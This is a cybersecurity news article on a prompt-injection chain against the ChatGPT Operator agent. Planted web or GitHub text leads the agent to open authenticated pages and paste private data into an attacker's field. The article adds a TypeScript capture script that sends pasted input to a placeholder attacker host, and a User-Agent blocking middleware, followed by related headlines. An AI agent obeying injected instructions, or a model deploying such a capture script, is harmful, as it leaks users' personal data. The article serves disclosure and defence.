ChatGPT Operator Prompt Injection Exploit Leaking Private Data

OpenAI’s ChatGPT Operator, a cutting-edge research preview tool designed for ChatGPT Pro users, has recently come under scrutiny for vulnerabilities that could expose sensitive personal data through prompt injection exploits. The demonstrated attack chain unfolds in three stages.

Hijacking Operator via Prompt Injection: Malicious instructions are hosted on platforms such as GitHub issues or embedded in the text of web pages that the agent later reads.

Navigating to Sensitive Pages: The injected instructions trick Operator into accessing authenticated pages containing personally identifiable information (PII), such as email addresses or phone numbers. In one demonstration, Operator was tricked into extracting a private email address from a user’s YC Hacker News account.

Leaking Data via Third-Party Websites: Operator is then manipulated to copy that information and paste it into an input field on a third-party server’s page, which captures the data without requiring a form submission.

OpenAI has layered several defenses onto Operator. Inline Confirmation Requests ask the user to confirm certain actions within the chat interface before proceeding, while Out-of-Band Confirmation Requests display intrusive confirmation dialogues explaining the potential risks whenever Operator crosses website boundaries or executes complex actions. Additionally, websites could adopt measures to block AI agents from accessing sensitive pages by identifying them through unique User-Agent headers. Despite these measures, prompt injection attacks remain partially effective due to their probabilistic nature: both the attacks and the defenses depend on specific conditions being met. Since Operator sessions run server-side, OpenAI itself potentially has access to session cookies, authorization tokens, and other sensitive data.
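
To make the final stage concrete, the following sketch shows how a capture page can harvest pasted text without any form submission. This is an illustrative assumption written in TypeScript for the browser, not code from the research; the element id "leak-sink" and the endpoint https://attacker.example/collect are hypothetical.

    // Hypothetical client-side script on the attacker's capture page.
    // An "input" listener fires on every keystroke or paste, so the data
    // leaks the moment Operator pastes it, with no Submit click needed.
    const sink = document.getElementById("leak-sink") as HTMLInputElement;

    sink.addEventListener("input", () => {
      // Forward whatever was pasted to the attacker-controlled endpoint.
      void fetch("https://attacker.example/collect", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ captured: sink.value }),
      });
    });

On the defensive side, the article notes that sites could identify and block AI agents through their User-Agent headers. The Express middleware below is a minimal sketch of that idea, assuming a Node.js/TypeScript stack; the patterns are placeholders, since the exact User-Agent string Operator sends is not quoted in the article.

    import express from "express";

    const app = express();

    // Placeholder patterns: verify against the agent's real User-Agent string.
    const AGENT_PATTERNS = [/operator/i, /gptbot/i];

    app.use((req, res, next) => {
      const ua = req.get("User-Agent") ?? "";
      if (AGENT_PATTERNS.some((p) => p.test(ua))) {
        // Refuse automated agents on authenticated or sensitive routes.
        res.status(403).send("Automated agents are not permitted here.");
        return;
      }
      next();
    });

    // Example sensitive route that would otherwise expose account details.
    app.get("/account/settings", (_req, res) => {
      res.send("Authenticated account page");
    });

    app.listen(3000);

Such filtering is only a partial control, since User-Agent headers can be spoofed or omitted by other clients.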

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 18 Feb 2025 06:40:06 +0000


Cyber News related to ChatGPT Operator Prompt Injection Exploit Leaking Private Data

XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT - With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information. In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ...
1 year ago Imperva.com
How to perform a proof of concept for automated discovery using Amazon Macie | AWS Security Blog - After reviewing the managed data identifiers provided by Macie and creating the custom data identifiers needed for your POC, it’s time to stage data sets that will help demonstrate the capabilities of these identifiers and better understand how ...
4 months ago Aws.amazon.com
Forget Deepfakes or Phishing: Prompt Injection is GenAI's Biggest Problem - Cybersecurity professionals and technology innovators need to be thinking less about the threats from GenAI and more about the threats to GenAI from attackers who know how to pick apart the design weaknesses and flaws in these systems. Chief among ...
1 year ago Darkreading.com
How enterprises are using gen AI to protect against ChatGPT leaks - ChatGPT is the new DNA of shadow IT, exposing organizations to new risks no one anticipated. Enterprise workers are gaining a 40% performance boost thanks to ChatGPT based on a recent Harvard University study. A second study from MIT discovered that ...
1 year ago Venturebeat.com
How Are Security Professionals Managing the Good, The Bad and The Ugly of ChatGPT? - ChatGPT has emerged as a shining light in this regard. Already we're seeing the platform being integrated into corporate systems, supporting in areas such as customer success or technical support. The bad: The risks surrounding ChatGPT. Of course, ...
1 year ago Cyberdefensemagazine.com
How AI can be hacked with prompt injection: NIST report - As AI proliferates, so does the discovery and exploitation of AI cybersecurity vulnerabilities. Prompt injection is one such vulnerability that specifically attacks generative AI. In Adversarial Machine Learning: A Taxonomy and Terminology of Attacks ...
11 months ago Securityintelligence.com
ChatGPT Extensions Could be Exploited to Steal Data and Sensitive Information - API security professionals Salt Security have released new threat research from Salt Labs highlighting critical security flaws within ChatGPT plugins, presenting a new risk for enterprises. Plugins provide AI chatbots like ChatGPT access and ...
11 months ago Itsecurityguru.org
Researchers Uncover Simple Technique to Extract ChatGPT Training Data - Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web? The answer is an emphatic yes, according to ...
1 year ago Darkreading.com
Google Researchers' Attack Prompts ChatGPT to Reveal Its Training Data - A team of researchers primarily from Google's DeepMind systematically convinced ChatGPT to reveal snippets of the data it was trained on using a new type of attack prompt which asked a production model of the chatbot to repeat specific words forever. ...
1 year ago 404media.co
Are you sure you want to share that with ChatGPT? How Metomic helps stop data leaks - Open AI's ChatGPT is one of the most powerful tools to come along in a lifetime, set to revolutionize the way many of us work. Workers aren't content to wait until organizations work this question out, however: Many are already using ChatGPT and ...
1 year ago Venturebeat.com
ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store - On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads and tracks and shares location data with ByteDance and Amazon, among others. ChatGPT, the AI software, has already taken the Internet by storm, and that is why ...
2 years ago Hackread.com
Locking Down ChatGPT: A User's Guide to Strengthening Account Security - OpenAI officials said that the user who reported his ChatGPT history was a victim of a compromised ChatGPT account, which resulted in the unauthorized logins. OpenAI has confirmed that the unauthorized logins originate from Sri Lanka, according to an ...
1 year ago Cysecurity.news
Google to Announce Chat-GPT Rival On February 8 Event - There seems to be a lot of consternation on Google's part at the prospect of a showdown with ChatGPT on the February 8 event. The search giant has been making moves that suggest it is preparing to enter the market for large language models, where ...
2 years ago Cybersecuritynews.com
OpenAI rolls out imperfect fix for ChatGPT data leak flaw - OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under ...
1 year ago Bleepingcomputer.com
Foreign states already using ChatGPT maliciously, UK IT leaders believe - Most UK IT leaders believe that foreign states are already using the ChatGPT chatbot for malicious purposes against other nations. That's according to a new study from BlackBerry, which surveyed 500 UK IT decision makers revealing that, while 60% of ...
2 years ago Csoonline.com
The Emergence of AI In the Enterprise: Know the Security Risks - As is often the case with any new, emerging technology, using AI comes with security risks, and it's essential to understand them and impose the proper guardrails around them to protect company, customer, and employee data. There are real, tangible ...
1 year ago Cyberdefensemagazine.com
Google Researchers Find ChatGPT Queries Collect Personal Data - The LLMs are evolving rapidly with continuous advancements in their research and applications. Recently, cybersecurity researchers at Google discovered how threat actors can exploit ChatGPT queries to collect personal data. StorageGuard scans, ...
1 year ago Cybersecuritynews.com
Latest Information Security and Hacking Incidents - Private cloud providers may be among the primary winners of today's generative AI gold rush, as CIOs are reconsidering private clouds, whether on-premises or hosted by a partner, after previously dismissing them in favour of public clouds. At the ...
9 months ago Cysecurity.news
Smashing Security podcast #307: ChatGPT and the Minister for Foreign Affairs Graham Cluley - Could a senior Latvian politician really be responsible for scamming hundreds of "Mothers-of-two" in the UK? And should we be getting worried about the AI wonder that is ChatGPT? All this and more is discussed in the latest edition of the "Smashing ...
2 years ago Grahamcluley.com
Hangzhou's Cybersecurity Breakthrough: How ChatGPT Elevated Ransomware Resolution - The Chinese media reported on Thursday that local police have arrested a criminal gang from Hangzhou who are using ChatGPT for program optimization to carry out ransomware attacks for the purpose of extortion. An organization in the Shangcheng ...
1 year ago Cysecurity.news
One Year of ChatGPT: Domains Evolved by Generative AI - ChatGPT has recently completed one year after its official launch. Since it introduced the world to the future, by showing what a human-AI interaction looks like, ChatGPT has eventually transformed the entire tech realm into a cultural phenomenon. ...
1 year ago Cysecurity.news
Google DeepMind Researchers Uncover ChatGPT Vulnerabilities - Scientists at Google DeepMind, leading a research team, have adeptly utilized a cunning approach to uncover phone numbers and email addresses via OpenAI's ChatGPT, according to a report from 404 Media. This discovery prompts apprehensions regarding ...
1 year ago Cysecurity.news
Why I Chose Google Bard to Help Write Security Policies - COMMENTARY. Ever since large language models like ChatGPT burst onto the scene a year ago, there have been a flurry of use cases for leveraging them in enterprise security environments. From the operational, such as analyzing logs, to assisting ...
1 year ago Darkreading.com
Chinese authorities arrest four in ransomware case involving ChatGPT - Four alleged cyberattackers have been arrested in mainland China for developing ransomware with the help of ChatGPT, the first case of its sort in the country. The South China Morning Post reported Friday that the suspects were arrested in November ...
1 year ago Siliconangle.com
